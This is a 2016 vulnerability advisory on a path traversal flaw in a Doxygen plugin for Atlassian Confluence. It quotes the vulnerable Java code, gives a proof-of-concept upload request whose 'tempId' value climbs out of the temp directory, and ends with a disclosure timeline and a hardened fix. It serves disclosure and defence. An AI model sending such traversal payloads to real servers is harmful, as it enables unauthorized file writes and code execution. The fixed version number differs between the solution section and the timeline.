RCESecurity Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product:        AppFusions Doxygen for Atlassian Confluence
Vendor URL:     www.appfusions.com
Type:           Path Traversal [CWE-22]
Date found:     2016-06-23
Date published: -
CVSSv3 Score:   6.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE:            -

2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCESecurity.

3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.

4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
- Doxygen blueprint in Confluence to allow Doxygen archive imports
- Display documentation from annotated sources such as Java (i.e., JavaDoc),
  C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and
  UNO/OpenOffice flavors), Fortran, VHDL, Tcl, D in Confluence.
- Navigation supports code structure (classes, hierarchies, files), element
  dependencies, inheritance and collaboration diagrams.
- Search documentation from within Confluence
- Restrict access to who can see/add what
- Doxygen in JIRA also available

(from the vendor's homepage)

5. VULNERABILITY DETAILS
========================
The application offers the functionality to import zipped Doxygen
documentation via a file upload to make it available within a
Confluence page. However, the application does not properly validate the
"tempId" parameter, which represents the directory where the contents of
the uploaded file will be extracted and stored. This leads to a path
traversal vulnerability when "/../" sequences are used as part of the
"tempId" parameter. Since the contents of the uploaded file are
extracted to the traversed directory, this vulnerability could also lead
to Remote Code Execution.

In DoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is
read as part of a GET request to "/plugins/servlet/doxygen/upload" and
afterwards used in a "getTemporaryDirectory()" call:

String tempId = request.getParameter("tempId");
String destination = this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath();

The "getTemporaryDirectory()" function is defined in
DefaultDoxyGenManager.java (lines 38-41) and constructs a file object
based on the "java.io.tmpdir" variable, the static string
"/doxygen-temp/", the user-supplied "tempId" and a file separator in
between all parts:

public File getTemporaryDirectory(String tempId) {
    File file = new File(System.getProperty("java.io.tmpdir") + File.separator + "doxygen-temp" + File.separator + tempId);
    return file;
}

In the subsequent code the uploaded file, as represented by the "file"
HTTP POST parameter to "/plugins/servlet/doxygen/upload", is extracted to
the directory which was built using the "file" object.

The following Proof-of-Concept triggers this vulnerability by uploading
a zipped file, which will be extracted to "/home/confluence" by the
application:

POST /plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 966
Content-Type: multipart/form-data; boundary=---------------------------62841490314755966452122422550
Cookie: doc-sidebar=300px; doxygen_width=256; JSESSIONID=75A487B49F38A536358C728B1BE5A9E1
Connection: close

-----------------------------62841490314755966452122422550
Content-Disposition: form-data; name="file"; filename="Traversal.zip"
Content-Type: application/zip

[zipped data]
-----------------------------98001232218371736091795669059--

6. RISK
=======
To successfully exploit this vulnerability the attacker must be
authenticated and must have the rights within Atlassian Confluence to
upload Doxygen files (default).

The vulnerability allows remote attackers to upload arbitrary files to
any destination directory writeable by the user of the web server, which
could lead to Remote Code Execution.

7. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4

8. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/06/2016: Discovery of the vulnerability
23/06/2016: Notified vendor via public security mail address
29/06/2016: No response, sent out another notification w/o details
29/06/2016: Response from vendor who asked for full details
30/06/2016: Sent over preliminary advisory with full details
03/07/2016: No response from vendor, sent out a status request
03/07/2016: Vendor temporarily removes product from website
11/07/2016: Vendor releases v1.3.1 which fixes the issue
20/11/2016: Advisory released
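As an added example (not the vendor's code and not the fix shipped in the patched release), the following is a hardened replacement for the getTemporaryDirectory() pattern quoted in section 5: it restricts "tempId" to a simple name and then verifies that the normalized path still sits directly beneath the doxygen-temp base. The class name SafeTempDir and the allowed id pattern are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Added example, not the plugin's own code: a safe version of the
// getTemporaryDirectory() logic from the advisory. The base directory is the
// same <java.io.tmpdir>/doxygen-temp the vulnerable code used.
public final class SafeTempDir {

    private final Path base;

    public SafeTempDir() {
        this.base = Paths.get(System.getProperty("java.io.tmpdir"), "doxygen-temp")
                .toAbsolutePath().normalize();
    }

    public Path getTemporaryDirectory(String tempId) {
        // First check: a plain identifier only, so no separators, no "." or "..".
        // The pattern is an assumption; adjust to whatever ids the caller generates.
        if (tempId == null || !tempId.matches("[A-Za-z0-9_-]{1,64}")) {
            throw new IllegalArgumentException("invalid tempId");
        }
        // Second check (defence in depth): after normalization the result must be
        // inside base and exactly one level below it.
        Path target = base.resolve(tempId).normalize();
        if (!target.startsWith(base) || !base.equals(target.getParent())) {
            throw new IllegalArgumentException("tempId escapes temp directory");
        }
        return target;
    }

    // Demonstration with constructed inputs, including the traversal value
    // from the advisory's proof of concept.
    public static void main(String[] args) {
        SafeTempDir dirs = new SafeTempDir();
        String[] samples = {
            "a1b2c3",                               // valid id
            "/../../../../../../home/confluence",   // traversal from section 5
            "..", "foo/bar", ""
        };
        for (String s : samples) {
            try {
                System.out.println("OK   \"" + s + "\" -> " + dirs.getTemporaryDirectory(s));
            } catch (IllegalArgumentException e) {
                System.out.println("DENY \"" + s + "\" (" + e.getMessage() + ")");
            }
        }
    }
}
```

The same base-directory check must also be applied to every entry name when the uploaded archive is extracted, since an entry name inside the zip can carry "../" just as the "tempId" parameter can.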